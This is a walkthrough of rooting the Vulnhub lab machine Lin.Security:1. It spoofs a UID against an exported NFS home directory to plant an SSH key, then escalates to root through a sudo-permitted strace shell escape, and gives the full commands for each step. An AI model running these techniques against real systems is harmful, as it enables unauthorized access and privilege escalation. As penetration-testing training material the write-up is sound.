Lin.Security: 1 Vulnhub Machine Walkthrough

Today, We will root Lin.Security:1 Machine from Vulnhub. This is a simple and straight forward boot2root machine.

Lets start by finding the IP.

root@kali:~# nmap -sS 192.168.18.0/24

Got the IP and open ports.

NFS is running on port 2019. Lets enumerate it.

root@kali:~# nmap -sV --script=nfs-* 192.168.18.102

We can mount /home/peter to our machine.

root@kali:/mnt# mkdir lin
root@kali:/mnt# mount 192.168.18.102:/home/peter /mnt/lin
root@kali:/mnt# ls -la

In order to login to the machine, we can place our ssh public key in .ssh directory

(refer this article to learn how to create an ssh key)

Copy our public key (id_rsa.pub) to /tmp directory.

root@kali:/mnt# cd /root/.ssh
root@kali:~/.ssh# ls -la
total 20
drw-------  2 root root 4096 Jul  2 07:25 .
drwx------ 35 root root 4096 Aug 17 07:17 ..
-rw-------  1 root root 2590 Aug 12 08:35 id_rsa
-rw-r--r--  1 root root  563 Aug 12 08:35 id_rsa.pub
-rw-r--r--  1 root root 3322 Aug 13 06:47 known_hosts
root@kali:~/.ssh# cp id_rsa.pub /tmp

make a directory named .ssh in the directory we just mounted.

root@kali:/mnt/lin# mkdir .ssh
mkdir: cannot create directory ‘.ssh’: Permission denied

We dont have the permission to create the directory.

Lets create a user with uid 1001 to do this.

root@kali:~# useradd -u 1001 peter

Now change the ownwership of /tmp/id_rsa.pub to peter

root@kali:~/.ssh# cd /tmp
root@kali:/tmp# chown peter:peter id_rsa.pub
root@kali:/tmp# 

Lets copy the file to the mounted directory now. First lets change the user to peter and copy the file.

root@kali:/mnt/lin# su peter
$ whoami
peter
$ mkdir .ssh
$ cd .ssh
$ cp /tmp/id_rsa.pub authorized_keys

We have copied our public key file to /tmp/.ssh/authorized_keys

Now, Let’s try to login as peter through ssh.

root@kali:~# cd .ssh
root@kali:~/.ssh# ssh [email protected]

We are now logged in as peter. Lets see what all we can do here as a privileged user.

peter@linsecurity:~$ sudo -l
Matching Defaults entries for peter on linsecurity:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User peter may run the following commands on linsecurity:
    (ALL) NOPASSWD: /usr/bin/strace

We can run /usr/bin/strace as root.

Can we escalate our privileges with this?

GTFOBins says yes!

Lets try.

peter@linsecurity:~$ sudo strace -o /dev/null /bin/sh
# whoami
root

We got the root!

This was a comparitively easier machine. Lets root another machine next day!